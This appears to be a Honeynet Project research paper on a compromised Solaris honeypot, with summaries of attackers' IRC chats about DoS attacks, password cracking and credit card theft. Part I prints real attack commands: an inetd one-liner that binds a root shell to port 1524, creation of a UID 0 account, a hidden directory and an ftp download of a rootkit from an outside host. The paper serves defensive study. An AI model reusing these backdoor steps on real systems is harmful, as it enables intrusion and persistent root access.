The Motives and Psychology of the Black-hat Community
This paper is a continuation of
the Know Your Enemy
series. This series is dedicated to learning the tools and tactics
of the black-hat community. Unlike the previous papers which focused purely on
the "what" and "how" of the black-hat community, specifically the technical tools,
their use and implementation, this paper explores the motivation and psychology
of the black-hat community, in their very own words. Part I starts with the compromise
of a Solaris 2.6 system. Part II provides information
rarely published, a record of conversations and actions which took place over a fourteen-day
period following the compromise of a honeypot system.
Learn how and why black-hats attack systems. Once the Solaris 2.6 system was
compromised, the black-hat put an IRC bot on our system. This bot,
configured and implemented by the black-hat, captured all their conversations
on an IRC channel. We monitored these conversations over a two week
period, all of which are contained here. This paper is not meant
to be a generalization of the black-hat community. Instead, we present
a specific incident involving several individuals. However, this should
give you an idea of how certain members can think and behave. This is a
common threat that we all face in the security community, and we
sincerely hope other security professionals benefit from this work.
This information was obtained
through the use of a honeynet. A honeynet is a network of various
designed to be compromised by the black-hat community. While some honeypots
are used to divert the attention of attackers from legitimate systems, the purpose
of a honeynet is to learn the tools and tactics of the black-hat community.
Most of the information provided in this document has been sanitized. Specifically,
user identities and passwords, credit card numbers, and most of the system
names involved have all been changed. However, the actual technical tools and the chat
sessions themselves have not been sanitized. All this information was forwarded
to both CERT and the FBI before being released. Also, over
370 notifications were sent out to administrators of systems we believed
This information was obtained through the use of a honeynet. A honeynet is a network of various honeypots, designed to be compromised by the black-hat community. While some honeypots are used to divert the attention of attackers from legitimate systems, the purpose of a honeynet is to learn the tools and tactics of the black-hat community. Most of the information provided in this document has been sanitized. Specifically, user identities and passwords, credit card numbers, and most of the system names involved have all been changed. However, the actual technical tools and the chat sessions themselves have not been sanitized. All this information was forwarded to both CERT and the FBI before being released. Also, over 370 notifications were sent out to administrators of systems we believed were compromised.
Foreword, by Brad Powell
Part I: The Compromise
On June 4, 2000 our Solaris 2.6 honeypot was compromised with the rpc.ttdbserv Solaris exploit, which allows the execution of code via a buffer overflow in the ToolTalk object database server (CVE-1999-0003). Note that this exploit is also listed as #3 in SANS Top Ten List. This attack was both detected and alerted by snort, a sniffer based IDS system.
Jun 4 11:37:58 lisa snort: IDS241/rpc.ttdbserv-solaris-kill: 192.168.78.12:877 -> 172.16.1.107:32775
The rpc.ttdbserv exploit is a buffer overflow attack that allows the remote user to execute commands on the system as root. The following command was executed, giving the black-hat a backdoor. The service ingreslock (predefined in /etc/services as port 1524) is added to a file called '/tmp/bob', and then inetd is executed with '/tmp/bob' as the configuration file. /bin/sh is then bound to port 1524 and is running as root, giving the remote user root access.
/bin/ksh -c echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob.
Once the black-hat created this backdoor, he connected to port 1524, accessed a shell as root, and executed the following commands. He creates two user accounts, so he can telnet back in. Notice the errors and control characters, the shell on port 1524 does not have a proper environment.
# cp /etc/passwd /etc/.tp;
Our black-hat now has two accounts on our compromised system. He can now telnet it as the user 're', then su to the user 'r', which has UID 0, thus gaining root access. We will now review the actual keystrokes of the black-hat as they do just that, and more.
Our black-hat now has root access. As common, the next step is retrieve the rootkit and take control of the system . First, we see the black-hat create a 'hidden' directory to hide the rootkit.
# mkdir /dev/".. "
After creating the directory, the black-hat retrieves the rootkit from another system.
# ftp shell.example.net
Once the rootkit is successfully downloaded, the kit is untared and installed. Notice how the entire rootkit is installed by executing a single script, setup.sh. This script also calls another script, secure.sh. You can download the entire Solaris rootkit used in this attack here.
# tar -xvf sun2.tar
Here the rootkit installation script first cleans out the log files to delete the information associated with the black-hat's activities.
After cleaning the log files, the next step is to secure our system (how nice of them). They know we are an easy kill and they do not want anyone else to ruin their compromised system.
Next, an IRC proxy is launched. What is bizarre is that later on the script kills this process. I have no idea why.
Irc Proxy v2.6.4 GNU
project (C) 1998-99
More file modifications are done. Not seen from the script output are the copying of Trojan binaries, including /bin/login, /bin/ls, /usr/sbin/netstat, and /bin/ps. I highly recommend you review the source of the setup.sh script and the secure.sh script to see what actually happens. One day you may have to review a system that has been rooted with a similar kit.
# kill -9 11467
Last, our black-hat launches an IRC bot. The purpose of this bot is to ensure they will maintain ops on the IRC channel of their choice. This bot also recorded all their conversations on the IRC channel. It is this bot that they installed on our compromised system that relayed their IRC chats on our network.
# ../me -f bot2
Once the bot was in place, they left the system alone. It is this bot that captured all of their conversations (see Part II below). For more information on IRC and how the black-hat community uses IRC and bots, we highly recommend the paper Tracking Hackers on IRC by David Brumley. Over the course of the following week they returned several times, only to confirm that they still had access. One week later, on 11 June, they connected again and attempted to use the system for Denial of Service attacks. However, the honeynet is designed to block any attempt to use a honeypot as a base of an attack against outside systems. All attempts to use the honeypot for a Denial of Service attack were automatically blocked.
What we have witnessed here are commonly used tools and tactics of the black-hat community. Our black-hat randomly scanned the Internet for a known vulnerability (in this case rpc.ttdbserv). Once identified, they quickly compromised the system and installed a rootkit using commonly scripted tools. Once they had control, they installed a bot, most likely to ensure they would maintain 'ops' on the IRC channels of their choice. What is uncommon are the two weeks of IRC chat sessions that their bot captured for us. In the next part of this paper, we discover the motivations and psychology of the black-hat community, in their own words. If you are concerned that your system(s) may have been compromised by similar means, review this checklist. It covers what to check for and links on how to react to a system compromise.
Part II: The IRC
Our chat sessions begin with the discussion of building an exploit archive and the sharing of exploits to be used against potential targets.
Today D1ck and J4n3 share exploits and Denial of Service attacks. Notice how they brag about how many blists (broadcast amplifier networks) they have for the attacks. Looks like one of them is gunning for Linux boxes in .edu land. They also discussed using new rootkits for Linux and sparc.
D1ck and J4n3 brag about the systems they have launched Denial of Service attacks against. Later on D1ck teaches J4n3 how to mount a drive. Then they discuss sniffit (how to use it) and last, D1ck desperately looks for an Irix exploit and rootkit.
D1ck and J4n3 decided they want to take out India with Denial of Service attacks and bind exploits. Later on, they DoS other IRC members who irritate them.
D1ck asks J4n3 to take out three systems for him. D1ck and his elite buddy Sp07 try to figure out how a sniffer works "umm doesnt it have to be the same network?".
Our wonder team has been busy, looks like D1ck rooted over 40 systems. If they scan enough systems, they can and will gain root.
Not an exciting day. D1ck teaches a new k1dd13 how to use the sadmind exploit. We are not sure if D1ck even knows how to use it himself.
D1ck and J4n3 discuss systems they own and people they want to DoS. D1ck discovers Ping of Death and thinks he is very k3wl.
Looks like D1ck strikes it big, he finds an ISP and gains access to their billing and over 5,000 user accounts. Now they have to figure out how to crack them.
Sp07 joins the gang today. Not the friendliest individual for the Internet community. Seems to have taken a wee bit of a dislike to India also.
They start cracking user passwords and access personal accounts.
D1ck and J4n3 try to find credit card numbers on a Credit Card channel so they can buy some domain names.
D1ck and J4n3 cover how to gain accounts on a Linux box, talk more about Credit Cards and continue building a website.
We have just reviewed 14 days in the life of the black-hat community. This is not meant to imply that all black-hats think and act like this. In fact, we have focused only on a few specific individuals. However, we hope this information gives you an idea of what many of the community are capable of. They may not be technically competent, or even understand the tools they are using. However by focusing on a large number of systems, they can achieve dramatic results. This is not a threat to take lightly. They are not concerned about what harm they may cause. They focus only on achieving their goals.
We would like to thank Alan Paller of SANS. Though not a member of the Honeynet Project, he has helped make this research a reality.